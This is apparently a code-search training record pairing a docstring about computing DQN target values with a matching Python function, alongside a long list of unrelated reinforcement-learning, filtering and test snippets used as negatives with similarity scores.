= [x[1] - x[0] for x in sonar_sim_list if abs(x[0] - x[1]) < 0.8]\n\n #H_matrix = self.calculate_H(sonar_sim_est[0], sonar_sim_est[1])\n H_matrix = self.calculate_H(object_loc)\n\n # these are correct\n V_matrix = np.eye(H_matrix.shape[0])\n R_matrix = np.eye(H_matrix.shape[0])*self.sensor_var\n\n return(H_matrix, V_matrix, R_matrix)", "def evaluate_prediction(self):\n\n # ratio_train = self.evaluate_data(self.train_x, self.train_y)\n ratio_test = self.evaluate_data(self.test_x, self.test_y)\n\n print(\"\\n*NAIVE BAYES:\")\n # print(\"Test1: {}%\".format(ratio_dev*100))\n print(\"Test: {} %\".format(ratio_test*100))", "def env_step(self, action):\n random_prob = np.random.uniform(0, 1)\n if random_prob <= self.stochasticity: # Ignore agent's action and move to one of the 8 neighbours\n # Determine how the agent moves (from -1 to 1 in each direction, but not both 0)\n random_nn = np.random.randint(0, len(self.nn))\n random_y = self.nn[random_nn, 0]\n random_x = self.nn[random_nn, 1]\n\n # Move to one of the nearest neighbours\n self.current_state[0] += random_y\n self.current_state[1] += random_x\n else: # Perform agent's action\n # Update current stated based on the action the agent took\n curr_x = self.current_state[1]\n self.current_state[0] += self.actions[action][0] + self.wind[curr_x]\n self.current_state[1] += self.actions[action][1]\n\n # Check if the agent fell out of the boundaries of the grid world\n y_coord = self.current_state[0]\n x_coord = self.current_state[1]\n\n if y_coord >= self.num_rows: # Agent went too far up\n self.current_state[0] = self.num_rows - 1\n elif y_coord < 0: # Agent went too far down\n self.current_state[0] = 0\n\n if x_coord >= self.num_cols: # Agent went too far right\n self.current_state[1] = self.num_cols - 1\n elif x_coord < 0: # Agent went too far left\n self.current_state[1] = 0\n\n is_terminal = False\n reward = -1.0\n\n # Check if the agent reached a terminal state\n if self.current_state == self.terminal_state:\n is_terminal = True\n reward = 0.0\n\n return reward, self.current_state, is_terminal", "def epsilon(current_episode, num_episodes):\n # return 1 - (current_episode/num_episodes)\n return .5 * .9**current_episode", "def predict(self, observation):\n # input must contain past state, so we get it\n (state_mean, state_covariance) = self.update_state()\n\n # print(\"Update state:\", state_mean, state_covariance)\n # predict new state\n # print(\"Previous state:\", state_mean[0],\"\\nObservation:\", observation)\n next_state_mean, next_state_covariance = self.kf.filter_update(state_mean[0], state_covariance[0], observation)\n # print(\"PREDICTION:\", next_state_mean)\n\n # add observation to history\n if not observation:\n self.obs_history.append(-1e8) # todo check out np.ma.compress_rows(np.ma.masked_invalid(trks))\n else:\n self.obs_history.append(observation)\n # print(\"Next state:\", next_state_mean)\n\n # only return position out of the state coordinates pos, vel, acc\n return next_state_mean[0]", "def predict(self, u):\n\n dtheta_l = self.current_state_estimate[0,0]\n dtheta_r = self.current_state_estimate[1,0]\n v = self.current_state_estimate[2,0]\n w = self.current_state_estimate[3,0]\n x = self.current_state_estimate[4,0]\n y = self.current_state_estimate[5,0]\n theta = self.current_state_estimate[6,0]\n vl = u[0,0]\n vr = u[1,0]\n \n # Vary noise with input voltage\n if abs(self.current_state_estimate[0,0]) < .03:\n self.Q[0,0] = .0000001\n dtheta_l = 0\n\n else:\n self.Q[0,0] = abs(vl)*.03/3000+.03\n\n if abs(self.current_state_estimate[1,0]) < .03:\n self.Q[1,1] = .0000001\n dtheta_r = 0\n else:\n self.Q[1,1] = abs(vr)*.03/3000+.03\n\n ## TRANSITION ESTIMATE\n self.current_state_estimate[0] += self.dt*(self.k2_l*dtheta_l + self.k1_l*vl)\n self.current_state_estimate[1] += self.dt*(self.k2_r*dtheta_r + self.k1_r*vr)\n self.current_state_estimate[2] = self.r/2 * (self.current_state_estimate[0] + self.current_state_estimate[1])\n self.current_state_estimate[3] = self.r/self.l * (self.current_state_estimate[1] - self.current_state_estimate[0])\n self.current_state_estimate[4] += (self.dt)*self.current_state_estimate[2]*math.cos(theta)\n self.current_state_estimate[5] += (self.dt)*self.current_state_estimate[2]*math.sin(theta)\n self.current_state_estimate[6] += (self.dt)*self.current_state_estimate[3]\n \n ## TRANISTION PROBABILITY\n # only propogate the things that can move\n self.A[0:7, 0:7] = np.array([[1+self.dt*self.k2_l, 0, 0, 0, 0, 0, 0],\\\n [0, 1+self.dt*self.k2_r, 0, 0, 0, 0, 0],\\\n [self.r/2, self.r/2, 0, 0, 0, 0, 0],\\\n [-self.r/self.l, self.r/self.l, 0, 0, 0, 0, 0],\\\n [0, 0, math.cos(theta)*self.dt , 0, 1, 0, -v*math.sin(theta)*self.dt],\\\n [0, 0, math.sin(theta)*self.dt , 0, 0, 1, v*math.cos(theta)*self.dt],\\\n [0, 0, 0, self.dt, 0, 0, 1]])\n \n self.current_prob_estimate = np.dot(np.dot(self.A, self.current_prob_estimate), np.transpose(self.A)) + self.Q", "def predict(model, session_batch):\n predicted = np.zeros((len(session_batch), 4))\n for i, session in enumerate(session_batch): \n legal_moves = session.possible_moves(session.current_player())\n move_preds = get_move_predictions(model, legal_moves, session)\n\n chosen_move_index = move_preds[:, 0].argmax()\n predicted[i, :] = move_preds[chosen_move_index, :]\n return predicted", "def predict(self, u, dt):\n # if self.is_filter_stale():\n # return False\n # angular update\n th_dot = u[3] * dt + randn(self.num_particles) * self.input_std_error[3]\n self.particles[:, 0] = self.particles[:, 0] * np.cos(th_dot) - self.particles[:, 1] * np.sin(th_dot)\n self.particles[:, 1] = self.particles[:, 0] * np.sin(th_dot) + self.particles[:, 1] * np.cos(th_dot)\n \n # linear update\n self.particles[:, 0] += u[0] * dt + randn(self.num_particles) * self.input_std_error[0]\n self.particles[:, 1] += u[1] * dt + randn(self.num_particles) * self.input_std_error[1]\n self.particles[:, 2] += u[2] * dt + randn(self.num_particles) * self.input_std_error[2]\n\n return True", "def test_reward(self):\n success = True\n old_sim = self.sim\n old_robot_num = self.robot_num\n old_agents = copy.deepcopy(self.agents)\n old_obstacles = copy.deepcopy(self.obstacles)\n old_goals = copy.deepcopy(self.goals)\n old_action_list = copy.deepcopy(self.last_actions)\n\n # Test collision penalties and overtaking penalty\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0,0)\n )\n self.obstacles = []\n self.goals = []\n self.last_actions = []\n self.robot_num = self.sim.addAgent((0, 0))\n self.agents = [self.robot_num]\n self.agents.append(self.sim.addAgent((0.1, 0.1)))\n self.agents.append(self.sim.addAgent((-0.1, 0.1)))\n self.agents.append(self.sim.addAgent((0.1, -0.1)))\n self.agents.append(self.sim.addAgent((-0.1, -0.1)))\n r = self.reward()[0].item()\n exp = -4.22\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -4 for 4 collisions, -0.2 for 4 predicted \"\n \"collisions, -0.02 for overtake penalty with top right agent\")\n\n # Test closeness penalties and overtaking penalty\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0,0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.agents = [self.robot_num]\n self.agents.append(self.sim.addAgent((0.35, 0.35)))\n self.agents.append(self.sim.addAgent((0.35, -0.35)))\n self.agents.append(self.sim.addAgent((-0.35, 0.35)))\n self.agents.append(self.sim.addAgent((-0.35, -0.35)))\n r = self.reward()[0].item()\n exp = -1.02\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -1 for 4 closeness violations, -0.02 for \"\n \"overtake penalty with top right agent\")\n\n # Test passing penalty\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0, 0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.agents = [self.robot_num]\n self.agents.append(self.sim.addAgent((0.7, -0.5), 1.0, 10, 5.0, 5.0,\n 0.2, 1.5, (-0.5, 0)))\n r = self.reward()[0].item()\n exp = -0.02\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -0.02 for passing violation\")\n\n # Test crossing penalty\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0, 0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.agents = [self.robot_num]\n self.agents.append(self.sim.addAgent((0.35, 0.3), 1.0, 10, 5.0, 5.0,\n 0.2, 1.5, (0, -0.5)))\n r = self.reward()[0].item()\n exp = -0.27\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -0.02 for crossing violation, -0.25 for \"\n \"closeness violation\")\n\n # Test action penalty (moving)\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0, 0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.last_actions = [1, 1]\n self.last_action_ind = 0\n r = self.reward()[0].item()\n exp = -0.01\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -0.01 for moving\")\n\n # Test action penalty (changing actions)\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0, 0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.last_actions = [1, 0]\n self.last_action_ind = 0\n r = self.reward()[0].item()\n exp = -0.01\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -0.01 for changing actions\")\n\n self.sim = old_sim\n self.robot_num = old_robot_num\n self.agents = old_agents\n self.obstacles = old_obstacles\n self.goals = old_goals\n self.last_actions = old_action_list\n return success", "def test_deterministic(self):\n add_noise = self.variant(exploration.add_dirichlet_noise)\n\n # Test that noisy and noisless actions match for zero Dirichlet noise\n for _ in range(10):\n prior = np.random.normal(0., 1., (self._batch_size, self._num_actions))\n\n # Test output.\n self._rng_key, key = jax.random.split(self._rng_key)\n noisy_prior = add_noise(\n key, prior, dirichlet_alpha=0.3, dirichlet_fraction=0.)\n np.testing.assert_allclose(prior, noisy_prior)", "def act(self, observation):\n self.epsilon *= self.epsilon_decay\n\n if np.random.rand() < self.epsilon:\n return self.action_space.sample()\n else:\n return self.get_best_action(observation)", "def epsilon_insensitive(y_true,y_pred, epsilon):\n loss = T.maximum(T.abs_(y_true-y_pred)-epsilon,0)\n return loss", "def test_nn_predicts_accurate_results(self):\n self.nn.train_nn(self.X_train, self.y_train, 6, 10, 0.06)\n accuracy = 0\n X_test, y_test = load_data(\"../data/testdata.mat.tar.gz\")\n for i in range(len(X_test[:100])):\n out = self.nn.forward_prop(X_test[i])[0][-1]\n if np.argmax(out) == np.where(y_test[i])[0][0]:\n accuracy += 1\n else:\n print(\"Incorrect\", np.argmax(out))\n print(\"accuracy: \", accuracy)\n self.assertGreaterEqual(accuracy, 70)", "def getReward(self):\n# def evaluateFitness(self):\n fitness = 0.0\n distance = self.env.getDistance()\n speed = self.env.getSpeed()\n theta = self.env.getOrientation()\n\n ## implementation 101\n timeBonus = (self.maxTime - self.t)/self.maxTime\n alpha = 1.0/((1+distance)*(1+fabs(theta))*(speed+1));\n if distance < 0.5*self.env.init_distance :\n if(distance < self.env.vicinity_distance and\n abs(theta) < self.env.vicinity_orientation and\n speed < self.env.vicinity_speed ):\n fitness = 1 + timeBonus; \n else:\n fitness = alpha;\n else: fitness = 0\n self.lastFitness = fitness\n if fitness > self.bestFitness : \n self.bestFitness = fitness \n\n return fitness", "def run_prediction(self):\r\n self.get_prediction_indices()\r\n self.walk_forward_prediction()", "def test_neuron(self):\r\n # crear una lista 1-D (Horizontal, Entradas).\r\n Z = [1, 2, 3]\r\n # crear una lista 1-D (Vertical, Pesos de la red).\r\n W = [10, 20, 30]\r\n # Inicializamos la neurona, y obtenemos el valor que toma dado W * Z\r\n # X(k) = W * Z\r\n result = rhonn(W, Z).predict()\r\n # Comprobamos el resultado \r\n self.assertEqual(result, 140)", "def motion_model(particle_poses, speed_command, odom_pose, odom_pose_prev, dt):\n \n M = particle_poses.shape[0]\n \n # TODO. For each particle calculate its predicted pose plus some\n # additive error to represent the process noise. With this demo\n # code, the particles move in the -y direction with some Gaussian\n # additive noise in the x direction. Hint, to start with do not\n # add much noise.\n\n #time is in ns 1e-9\n dt = dt * 1e-9\n \n if dt ==0:\n return particle_poses\n\n for m in range(M):\n\n theta = particle_poses[m, 2]\n\n v = speed_command[0]\n omega = speed_command[1]\n \n if motion_model_velocity: #Velocity\n\n if omega == 0: #straight\n vel_dx = v * cos(theta) * dt\n vel_dy = v * sin(theta) * dt\n vel_dtheta = 0\n\n else:\n vel_dx = -v / omega * sin(theta) + v / omega * sin(theta + omega * dt)\n vel_dy = v / omega * cos(theta) - v / omega * cos(theta + omega * dt)\n vel_dtheta = omega * dt\n \n\n\n if motion_model_odom:\n odom_mov = rev_odm(odom_pose, odom_pose_prev)\n\n #particle_poses[m] = fwd_odm(particle_poses[m], odom_mov)\n\n #odom_dpose = fwd_odm2(particle_poses[m], odom_mov)\n (odom_dx, odom_dy, odom_dtheta) = fwd_odm2(particle_poses[m], odom_mov)\n\n\n\n\n #fusion\n w = motion_weighting\n dx = w * odom_dx + (1-w) * vel_dx\n dy = w * odom_dy + (1-w) * vel_dy\n dtheta = w * odom_dtheta + (1-w) * vel_dtheta\n \n \n\n \n \n #process noise\n if motion_model_noise:\n noise_x= np.random.normal(0, motion_sigma_x)\n noise_y= np.random.normal(0, motion_sigma_y)\n noise_theta= np.random.normal(0, motion_sigma_theta)\n \n #local noise\n if motion_model_noise_alt:\n localnoise_x = np.random.normal(0, motion_sigma_x)\n localnoise_y = np.random.normal(0, motion_sigma_y)\n\n noise_x = localnoise_x * cos(theta) - localnoise_y * sin(theta)\n noise_y = localnoise_y * sin(theta) + localnoise_y * cos(theta)\n noise_theta = np.random.normal(0, motion_sigma_theta)\n\n\n\n particle_poses[m, 0] += dx + noise_x\n particle_poses[m, 1] += dy + noise_y\n particle_poses[m, 2] = wraptopi(theta + dtheta + noise_theta)\n\n \n return particle_poses", "def time_to_failure():\r\n return random.expovariate(BREAK_MEAN)", "def epsilon_greedy(Q, epsilon, n_actions, s, train=False):\n if train or np.random.rand() < epsilon:\n action = np.argmax(Q[s, :])\n else:\n action = np.random.randint(0, n_actions)\n return action", "def test_move_default_extra_steps(self):\n player = ss.ResilientPlayer()\n random.seed(2)\n player.move()\n random.seed(1)\n player.move()\n random.seed(2)\n player.move()\n assert player.position == 32", "def random_play(board, NN, device=\"cpu\"):\r\n board_state_string = board.fen() # obtain state from board\r\n state_array = input_state(board_state_string) # turn state into an array format for NN\r\n is_black = not is_white(board_state_string)\r\n print(\"is black: \",is_black)\r\n legal_moves_array = np.zeros([4672]) # initialize array of legal moves\r\n legal_moves_array, move_dict = return_legal_moves(board, is_black)\r\n # print(\"state array shape: \", state_array.shape)\r\n # print(\"legal array sahpe: \", legal_moves_array.shape)\r\n legal_moves_prob_distribution, _ = (NN.run(state_array, legal_moves_array, device=device)) #we're assuming that NN forward runs the neural network\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution / np.sum(legal_moves_prob_distribution) # normalize\r\n legal_moves_prob_distribution = legal_moves_prob_distribution.numpy().reshape(4672)\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution - np.min(legal_moves_prob_distribution)\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution /legal_moves_prob_distribution.sum()\r\n # print(\"legal_moves_prob_distribution sum \",abs(legal_moves_prob_distribution).sum())\r\n # print(\"legal_moves_prob_distribution sum \",(legal_moves_prob_distribution* legal_moves_arrayCopy).sum())\r\n # print(\"legal_moves_prob_distribution sum \",(legal_moves_prob_distribution).sum())\r\n action_idx = np.random.choice(4672, p = legal_moves_prob_distribution )\r\n print(\"action idx: \", action_idx)\r\n action_array = np.zeros([4672])\r\n action_array[action_idx] = 1\r\n move_text = move_dict[action_idx]\r\n print(\"move text: \", move_text)\r\n env_move = chess.Move.from_uci(move_text)\r\n board.push(env_move)\r\n return action_array", "def test_move(self):\n neq_gcmc_system_sampler.reset()\n\n # Just run one move, as they are a bit more expensive\n neq_gcmc_system_sampler.move(neq_gcmc_system_simulation.context, 1)\n\n # Check some of the variables have been updated as appropriate\n assert neq_gcmc_system_sampler.n_moves == 1\n assert 0 <= neq_gcmc_system_sampler.n_accepted <= 1\n assert len(neq_gcmc_system_sampler.Ns) == 1\n assert len(neq_gcmc_system_sampler.acceptance_probabilities) == 1\n\n # Check the NCMC-specific variables\n assert isinstance(neq_gcmc_system_sampler.velocities, Quantity)\n assert neq_gcmc_system_sampler.velocities.unit.is_compatible(nanometers/picosecond)\n assert len(neq_gcmc_system_sampler.insert_works) + len(neq_gcmc_system_sampler.delete_works) == 1\n assert 0 <= neq_gcmc_system_sampler.n_explosions <= 1\n\n return None", "def simulatedAnnealing(problem, maxSteps, userInteraction, beQuiet):\n\n import random\n from math import exp\n\n currentState = problem.state\n steps = 0\n bestYet = currentState\n # for visualization\n problem.hVals.append(problem.getObjValue(currentState))\n\n while steps<maxSteps:\n if problem.isGlobalOptimum(currentState):\n return steps, bestYet\n temperature = tempSchedule(steps, maxSteps)\n # print(temperature)\n if temperature == 0:\n return currentState\n neighbour = problem.getRandomNeighbour(currentState)\n changeInObj = problem.getObjValue(neighbour) - \\\n problem.getObjValue(currentState)\n if changeInObj > 0:\n # if the neighbour is better, jump\n currentState = neighbour\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n print(\"Greedy step taken.\")\n problem.visualize(currentState)\n steps+=1\n\n currentVal = problem.getObjValue(currentState)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(currentVal, bestYetVal):\n bestYet = currentState\n\n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n\n else:\n # if the neighbour is worse, jump with some probability\n if random.random() < exp(-1*changeInObj/temperature):\n \n currentState = neighbour\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n print(\"Step in a worse direction taken.\")\n problem.visualize(currentState)\n steps+=1\n\n currentVal = problem.getObjValue(currentState)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(currentVal, bestYetVal):\n bestYet = currentState\n\n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n return steps, bestYet", "def getPrediction(self, dna):\n \n # 1. run each predictor.\n #scoreSorted = sorted(self.Predictors, key=operator.attrgetter('score'))\n scoreSorted = self.Predictors\n \n chosenPredictor = None\n self.LastPredictor = None\n for i, predictor in enumerate(scoreSorted): \n predictor.update()\n \n move, confidence = predictor.play()\n predictor.moveLastTurn = move\n \n #confidence = round(confidence, 2) # round to the nearest 2 decimals\n \n #if confidence > 0.9: confidence = 0.9\n \n predictor.confidence = confidence\n \n #2. select the predictors with the highest confidence and score\n move, confidence = self.getHighestRank(dna)\n \n# predictor = self.LastPredictor\n# print(\"%s: %i (+%i/-%i) %.2f %f\" % (predictor.name.ljust(24), predictor.moveLastTurn,predictor.scoreWins, predictor.scoreLosts, predictor.confidence, predictor.rankingConfidence))\n\n #3. return the highest ranking\n return move, confidence", "def predict(self):\n if ((self.kf.x[6] + self.kf.x[2]) <= 0):\n self.kf.x[6] *= 0.0\n self.kf.predict()\n self.age += 1\n if (self.time_since_update > 0):\n self.hit_streak = 0\n self.time_since_update += 1\n self.history.append(convert_x_to_bbox(self.kf.x))\n return self.history[-1]", "def test():\n \n print('Loading best networks')\n env.guesser, agent.dqn = load_networks(i_episode='best')\n #env.guesser, agent.dqn = load_networks(i_episode='best', avg_reward = )\n\n # predict outcome on test data\n y_hat_test = np.zeros(len(env.y_test))\n y_hat_test_prob = np.zeros(len(env.y_test))\n \n print('Computing predictions of test data')\n n_test = len(env.X_test)\n for i in range(n_test):\n \n if i % 1000 == 0:\n print('{} / {}'.format(i, n_test))\n \n state = env.reset(mode='test', \n patient=i,\n train_guesser=False)\n mask = env.reset_mask()\n \n # run episode\n for t in range(FLAGS.episode_length):\n\n # select action from policy\n action = agent.get_action(state, eps=0, mask=mask)\n mask[action] = 0\n \n # take the action\n state, reward, done, guess = env.step(action, mode='test') \n \n if guess != -1:\n y_hat_test_prob[i] = torch.argmax(env.probs).item()\n \n if done:\n break\n y_hat_test[i] = guess\n \n C = confusion_matrix(env.y_test, y_hat_test)\n print('confusion matrix: ')\n print(C)\n\n acc = np.sum(np.diag(C)) / len(env.y_test)\n\n print('Test accuracy: ', np.round(acc, 3))", "def advance(self):\n #x and y coordinates move and advance by adding the randomly generated velocity \n self.center.x += self.velocity.dx\n self.center.y += self.velocity.dy\n return", "def _predict(self):\n \n # Initialization\n x_k = np.random.rand(4,0)\n w_k = np.ones((1,0))\n \n self.reset(phd_only=True)\n \n # Prediction of the targets' positions\n for k in range(1, self.n_time_steps+1):\n\n if k in self.observed_data.keys():\n\n # perform phd filter\n\n x_k1, w_k1, estimated_x_k1, n_targ_pred = self.PHDfilter(x_k, w_k, self.observed_data[k], k)\n\n # save predicted positions and update parameters\n self.phd_filter['n_targets_predicted'][k] = n_targ_pred\n self.phd_filter['particles_positions'][k] = x_k1\n if estimated_x_k1 is not None:\n self.phd_filter['estimated_positions'][k] = estimated_x_k1\n x_k, w_k = np.copy(x_k1), np.copy(w_k1)\n\n else:\n self.phd_filter['n_targets_predicted'][k] = 0", "def epsilonGreedyChooser(normalAction, state, stepsDone):\n epsThreshold = EPS_END + (EPS_START - EPS_END) * math.exp(-1. * stepsDone / EPS_DECAY)\n randomSample = random.random()\n if randomSample > epsThreshold:\n action = normalAction(state).max(1)[1].view(1, 1)[0].item()\n #print(action)\n return action\n else:\n return ENVIRONMENT.action_space.sample()", "def predict(self, states, actions):\n \"\"\" YOUR CODE HERE \"\"\"\n # normalize the data\n n_states = (states-self.mean_obs)/(self.std_obs+self.epsilon)\n n_actions = (actions-self.mean_action)/(self.std_action+self.epsilon)\n n_stat = np.concatenate([n_states,n_actions],axis=1)\n \n # predict using the model and unnromalize\n feed_dict = {self.st_at : n_stat}\n n_stp1 = self.sess.run(self.delta, feed_dict=feed_dict)\n\n un_stp1 = n_stp1*self.std_deltas + self.mean_deltas + states\n\n return un_stp1", "def random_exploration_step(self, sess):\n episode_reward = 0.0\n episode_len = 0 #num of action\n \n # random policy\n random_policy = np.zeros((1,2*self.ACTION_DIM))\n \n #for each episode reset first\n state = self.env.reset()\n for t in range(self.FLAGS.max_episode_len):\n action = self.env.action_space.sample() # random action\n \n next_state, reward, done, info = self.env.step(action) # next state, reward, terminal\n \n # insert this in memory with a uniform distribution over actions\n \n self.memory.add(Transition(state=state, action=action, \n reward=reward, done=done, \n distribution=random_policy, next_state = next_state))\n \n # accumulate rewards\n episode_reward += reward\n episode_len += 1 \n \n local_t = next(self.local_counter)\n global_t = next(self.global_counter)\n \n \n # update the state \n state = next_state \n \n if done:\n # print(\"Episode finished after {} timesteps\".format(t+1))\n break\n \n return episode_reward, episode_len, local_t, global_t", "def simulate(state: GameState) -> int:\n moves = list(state.moves)\n #print(\" moves available: \", moves)\n for i in range(len(state.moves)):\n move = random.choice(moves)\n #print(\" move making: \", move)\n move_idx = moves.index(move)\n #print(\" index of move: \", move_idx)\n moves.pop(move_idx)\n #print(\" new moves available: \", moves)\n state = state.traverse(move)\n #print(\" Winner: \", state.util)\n #print(\" New Board: \", state.display)\n return state.util", "def move(self):\n self._move_range_shuffle(3)\n self._move_satisfy_random_constraint()\n # self._move_range_shuffle(3)\n #if (curr_energy > 50):\n # self._move_satisfy_random_constraint()\n #else:\n # self._move_range_shuffle(3)", "def get_action(history, epsilon, step, model):\n if np.random.rand() <= epsilon or step <= FLAGS.observe_step_num:\n return random.randrange(ACTION_SIZE)\n else:\n q_value = model.predict([history, np.ones(ACTION_SIZE).reshape(1, ACTION_SIZE)])\n return np.argmax(q_value[0])", "def get_reward(self):\n\t\tdist = np.sqrt(np.sum(np.square(np.asarray(self.state) - np.asarray(self.goal))))\n\n\t\tdist_diff = self.prev_dist - dist\n\t\tself.reward = dist_diff * 10\n\n\t\tself.prev_dist = dist", "def evaluate(self):\n # initialize delta_weights\n Loss = 0\n for i, x_test in enumerate(self.X_test):\n Loss += (self.sigmoid(np.dot(self.weights,x_test))-self.y_test[i])**2\n return Loss", "def rough_outcome(self) -> float:\n # HUYNH YOU PRICK WHY THE FUCK DO YOU MAKE US WRITE THIS SHIT EVEN IT'S NOT USED ANYWHERE\n # pick move based on this may not be optimal but better than random\n # return 1 if win immediately\n # return -1 if all states reachable will result the other player win\n # return 0 if otherwise ??? what the fuck does this mean\n # look two states forward\n pass", "def transition_human(self, position, velocity, goal, dt):\n # type: (np.ndarray, float, np.ndarray, float) -> np.ndarray\n\n std_noise=np.copy(self._human_std_dev)\n if velocity <= 0.2:\n std_noise = std_noise*velocity\n\n noise = np.random.normal(loc=0.0, scale=std_noise, size=3)\n change_in_position = (velocity * dt * normalize(goal - position))\n dist_to_goal=np.linalg.norm(goal-position)\n dist_change = np.linalg.norm(change_in_position)\n if dist_change>dist_to_goal:\n change_in_position = goal - position\n\n change_in_position+= noise\n return position + change_in_position", "def _prediction_step(self, time_diff_s):\n # x = A * x + B\n heading_r = math.radians(self.estimated_heading())\n from control.telemetry import Telemetry\n x_delta, y_delta = Telemetry.rotate_radians_clockwise(\n (0.0, time_diff_s),\n heading_r\n )\n speed_m_s = self.estimated_speed()\n transition = numpy.matrix([ # A\n [1.0, 0.0, 0.0, x_delta],\n [0.0, 1.0, 0.0, y_delta],\n [0.0, 0.0, 1.0, 0.0],\n [0.0, 0.0, 0.0, 1.0]\n ])\n\n # Update heading estimate based on steering\n new_heading = Telemetry.wrap_degrees(\n self.estimated_heading()\n + self._estimated_turn_rate_d_s * time_diff_s\n )\n self._estimates.itemset(2, new_heading)\n\n # TODO: Add acceleration values\n\n self._estimates = transition * self._estimates\n return transition", "def policy_eval(policy, env, discount_factor=1.0, theta=0.00001):\n\n # Start with a random (all 0) value function\n V = np.zeros(env.nS)\n \n while True: #any(Vdiff > theta):\n \n delta_V = 0\n\n for i in range(env.nS):\n \n # need to calculate the value of taking each of the available actions\n\n action_val = np.zeros(env.nA)\n\n for a in range(env.nA):\n \n # get transition tuple for this state and action\n tup = env.P[i][a][0]\n \n # calculate the value of this action/state? \n # value = reward + gamma * (prob * V[next_state])\n # error here I think, probability missing\n action_val[a] = tup[0] * (tup[2] + discount_factor * V[tup[1]])\n \n \n Vold = V[i]\n Vnew = np.dot(policy[i],action_val)\n delta_V = max(delta_V,np.abs(Vnew - Vold))\n # get state value by multiplying probability of taking action (policy) by action value\n V[i] = Vnew\n \n #print(action_val)\n #print(policy[i])\n #print(V[i])\n #print(delta_V)\n\n # function only works if I use this delta rule to terminate\n if delta_V < theta:\n break\n return np.array(V)", "def act(self, state, epsilon, env):\n if random.random() > epsilon:\n state = Variable(torch.FloatTensor(state)).unsqueeze(0) # adds extra dim when single input\n state = self.vari_gpu(state)\n _, u_opt = self.forward(state)\n action = (u_opt.cpu().detach().numpy()) # compute the u*[0] \n #print('act:q_value ',q_value)\n #print('act:model action ',action)\n else:\n rand = np.random.rand(int(np.array(env.action_space.shape)))\n high = env.action_space.high\n low = env.action_space.low\n action = low + rand*(high-low)\n #print('act: ',action)\n return action" ]
[ "0.702739", "0.69440806", "0.61970955", "0.60627735", "0.60549825", "0.6046344", "0.5988161", "0.5935208", "0.59265876", "0.59182566", "0.58736765", "0.5839762", "0.58332235", "0.5812775", "0.5812775", "0.5780309", "0.5775754", "0.5767696", "0.57500184", "0.57460207", "0.5745925", "0.5745838", "0.5720917", "0.5716849", "0.5715711", "0.57144064", "0.5710225", "0.5701234", "0.56990963", "0.5693721", "0.5688274", "0.5679081", "0.56787044", "0.5657852", "0.565436", "0.56520724", "0.564802", "0.56428814", "0.56394", "0.5632058", "0.55991393", "0.55964583", "0.5589674", "0.5583144", "0.55690324", "0.5556454", "0.5538535", "0.55327857", "0.5530325", "0.552897", "0.5525419", "0.5520339", "0.5512431", "0.5502124", "0.55011934", "0.55011714", "0.5486749", "0.5485374", "0.5482961", "0.5482222", "0.54783386", "0.54769105", "0.545877", "0.5457679", "0.54572177", "0.5456454", "0.54538953", "0.54486936", "0.54259145", "0.5425716", "0.5424205", "0.5418398", "0.5417004", "0.5411201", "0.54069275", "0.54057527", "0.53959733", "0.5395244", "0.53905916", "0.539034", "0.53875417", "0.538642", "0.5381477", "0.5378614", "0.5376681", "0.5372337", "0.53709656", "0.53647566", "0.53646636", "0.5358925", "0.5353479", "0.5353389", "0.53531796", "0.5351718", "0.534749", "0.5347332", "0.5344621", "0.5341667", "0.53408766", "0.5338023", "0.5329543" ]
0.0
-1
Calculate yj = rj + gamma argmaxQ or yj = rj (terminating state) This is the target value used to train the neural network and it uses the target network to make predictions
def get_target(self, batch): # initialise array to store yj values target = np.zeros((len(batch[0]), self.num_actions)) # loop over samples in the minibatch for j in range(len(batch[0])): a0_i = self.action_str2idx(batch[1][j]) r0 = batch[2][j] done = batch[3][j] s1 = batch[4][j] # if terminating state if done: target[j, a0_i] = r0 else: qs_target = self.target_Qmodel.predict(s1) target[j, a0_i] = r0 + self.gamma * np.max(qs_target) return target
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
